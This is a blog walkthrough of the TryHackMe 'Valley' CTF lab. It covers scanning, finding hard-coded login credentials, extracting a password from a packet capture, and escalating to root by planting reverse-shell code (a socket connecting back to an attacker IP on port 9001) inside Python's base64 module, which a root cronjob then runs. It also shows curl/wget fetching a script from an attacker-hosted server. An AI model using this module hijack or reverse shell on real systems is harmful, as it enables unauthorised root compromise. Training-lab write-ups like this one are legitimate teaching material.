Writeup: Valley CTF

Valley CTF Writeup

Valley CTF from TryHackMe includes many essentials cybersecurity topics, like:

  • Confidential information exposure;
  • PCAP analysis;
  • Reverse engineering of a ELF executable;
  • Horizontal privilege escalation;
  • Python module hijacking;
  • Vertical privilege escalation.
Behind Security webp logo
Simplifying cybersecurity

1. Port scanning

Common ports, also known as ‘Well-known Ports’ or ‘Registered Ports’, are numbered ports that have been assigned by the Internet Assigned Numbers Authority (IANA) for specific services and widely used protocols. These ports are numbered from 0 to 1023 and are reserved for common and widely recognized services.

However, after running a complete TCP scan with nmap, I noticed an unusual open port. Take a look below.

Valley CTF nmap scan
Nmap tcp scan result

The port 37370 is open, running an FTP server. I checked for vulnerabilities in the vsftpd 3.0.3 version but didn’t find anything relevant. I also attempted, without success, to exploit the FTP’s anonymous login functionality to see if there were any files available. Other than that, nothing out of the ordinary, port 22 running SSH (unfortunately, we don’t have valid credentials yet) and port 80 running HTTP, which will be our focus from now on.

2. Exploring the web server

The main page doesn’t provide much relevant information, and there isn’t anything interesting in the page source code so far.

Therefore, I ran feroxbuster, with the common dirb wordlist just to get a general overview of the website’s structure.

Feroxbuster scan result

After analyzing all the endpoints thoroughly, the ones that provided interesting information were: /static/ and /pricing/note.txt

————— /pricing/note.txt —————
Please stop leaving notes randomly on the website
————— End of content —————

The /static/ endpoint is where, theoretically, all the images from /gallery/gallery.html are stored, and it should be a directory index containing the images. However, instead of that, it indicates that it is a directory index but doesn’t list the content, even though there are images in /static/1 to /static/18. Strange.

Keeping that in mind, I ran feroxbuster again, but this time with a more powerful wordlist directly targeting the /static/ endpoint.

Feroxbuster scan result at /static

After scanning for a while, the entry /static/00 appeared. In addition to discovering a valid system user (valleyDev), I was able to access a hidden login portal in an unauthorized manner.

Hidden login portal

Before trying anything else, it’s always important to read the source code, to have a more in depth understanding about what is really going on behind the scenes. There’s a call for a script named dev.js, take a look at its code:

Hard-coded credentials

This JS script is responsible for authenticating the user through the login form, and we can see that there is no connection to a database or anything of the sort. The user’s input in the form is directly compared with the correct credentials on the client-side, which means we can view the username and password. Following the CTF standard, I censored the password ‘siemDev’ in the image so that you can try it yourself.

Once we logged in (we could have also directly accessed the endpoint present in the script above, /dev1243224123123/devNotes37370.txt), we were redirected to a page that seems to be a developer’s note. Among other things, the developer mentions the need to stop reusing credentials. With that in mind, I attempted, without success, to log in as siemDev via SSH. However, shortly after, I successfully logged in to the FTP server.

3. Exploring the FTP server

Connecting to the FTP server and extracting all available files

4. Traffic capture analysis

Wireshark is an open-source protocol analysis tool widely used by network and security professionals.

I downloaded some network traffic files (.pcap) from the FTP server and then, after analyzing them with Wireshark, I obtained detailed information about the packets that were sent and received on a network. I examined the packet contents, headers, and metadata, which revealed a crucial credential for progressing in the CTF.

Network traffic analysis

In the image, you can see that the client made an HTTP request with the POST method to /index.html. However, since it was HTTP and not HTTPS, which is encrypted, the information it sent to the website was exposed. The password has been censored as usual.

To reach the screen shown in the image, simply open the .pcapng file with Wireshark (you can run ‘wireshark file.pcapng’ from the command line), right-click on a packet that uses the TCP protocol (in this case, I saw HTTP requests and found them interesting), hover over ‘Follow,’ and then select ‘TCP Stream’.

5. Initial shell and horizontal privilege escalation

Using the exposed credentials from the network capture file, it is possible to log in via SSH with the user valleyDev. The user.txt flag is located in /home/valleyDev.

The first thing I religiously do upon obtaining an initial shell is find a way to transfer the latest version of linpeas to the machine (see more details below). If I can’t, the option is to search for another script or manually enumerate for privilege escalation vectors.

From the linpeas scan result, I could clearly see that there is a Python script running every 1 minute through a cronjob. Fortunately, my user has permission to read the file content, so I was able to understand better what the script is programmed to do.

  • Get the latest version of linpeas.

[Attacking machine]$ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh

  • Then, host a local web server using python.

[Attacking machine]$ python -m http.server 8000

  • On the CTF machine, download linpeas.

[CTF Machine – OPTION 1]$ cd /dev/shm && curl http://YOUR-VPN-IP-ADDRESS:8000/linpeas.sh -o linpeas.sh
[CTF Machine – OPTION 2]$ cd /dev/shm && wget http://YOUR-VPN-IP-ADDRESS:8000/linpeas.sh

Python code running every minute on the CTF machine

Not too complex, here we are importing the base64 module, initiating a loop through the range(1, 7), defining a variable with the path where the images are located in an adapted way, replacing the number at the front in each iteration of the loop. Then, we open the image file in byte-read mode, creating a file pointer in image_file, and create another variable to store the image data. The image data is encoded in base64, we define the location where the encoded image will be stored, and then open that location in byte-write mode (“wb”) and write the encoded image data there.

I checked the permissions of the directory to see if I could modify any image in a way that could take advantage of some aspect when the code processes the image, but I can’t change anything. So, I turned my attention to the base64 module that the script is importing at the beginning and started to think if it would be possible to modify that module.

In the Linux system, Python modules are stored in specific directories following a standard hierarchy. This directory is usually found at a path like “/usr/lib/pythonX.Y/site-packages” (where “X.Y” represents the specific version of Python installed). The “site-packages” directory is where external packages and libraries are installed. Each package or library can contain multiple related Python modules, organized into subdirectories.

In this case, the default Python modules are located in /usr/lib/python3.8/, and we can see the existence of the base64 module at /usr/lib/python3.8/base64.py. Checking the permissions of the file, I noticed that the group that owns the file is “valleyAdmin.” Very interesting.

Then, I checked who the members of the valleyAdmin group are, and with that information, I could focus my attention on the user ‘valley.’ The file ‘valleyAuthenticator’ in /home/valleyAuthenticator is at least unusual, and to make it even better, the owner of the file is ‘valley.’ Let’s take a closer look at this file.

Transfering the file to my machine and reading the content

I played around with the executable before doing this print procedure, but I didn’t get any promising results. So, I transferred the file to my machine to be able to perform some reverse engineering techniques. I thought I would need to open Ghidra and go deep into it, but not necessarily. A simple ‘strings’ command worked just fine for me.

Notice that when I filtered for the word ‘pass’ just above, amidst all the nonsensical content, there’s something valuable. What is highlighted in red on the right side of the screenshot is a hash (possibly hiding the user’s password), I realized it as soon as I saw it. I needed to fix it a bit since it wasn’t on a single line, but it was easy to use CrackStation with its rainbow table to crack the hash.

Using crackstation in order to crack the hash

After successfully cracking the hash, I proceeded to execute the binary on the CTF machine, specifying the user as ‘valley’ and using the password I just obtained. And voila! I succeeded. Right after that, I tried logging in as ‘valley’ using the command ‘su valley’, and there you have it! Now, I am valley.

6. Vertical privilege escalation

Now that we are authenticated as valley, we can edit the file /usr/lib/python3.8/base64.py, as we are part of valleyAdmin group.

Inserting malicious code inside python base64 module

import socket, subprocess, os
s.connect((“”, 9001))
import pty

When the cronjob runs the script at /photos/script/photosEncrypt.py, the base64 module will be imported, and the code above will be executed along with it. All that’s left is to have a netcat listener running on my machine, and we’re good to go. Remember to change the IP in s.connect((“IP”, 9001)) to your VPN’s IP address.

By doing this, simply save the file and patiently wait for the reverse connection from the machine as root. The root.txt flag is located at /root.

7. Conclusion

We hope you have found our content useful, and we invite you to explore more of our website to discover other interesting topics that we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and welcome feedback and suggestions through the contact form. Thank you for choosing BehindSecurity, and we look forward to seeing you again soon!

CortexNet png
Scroll to Top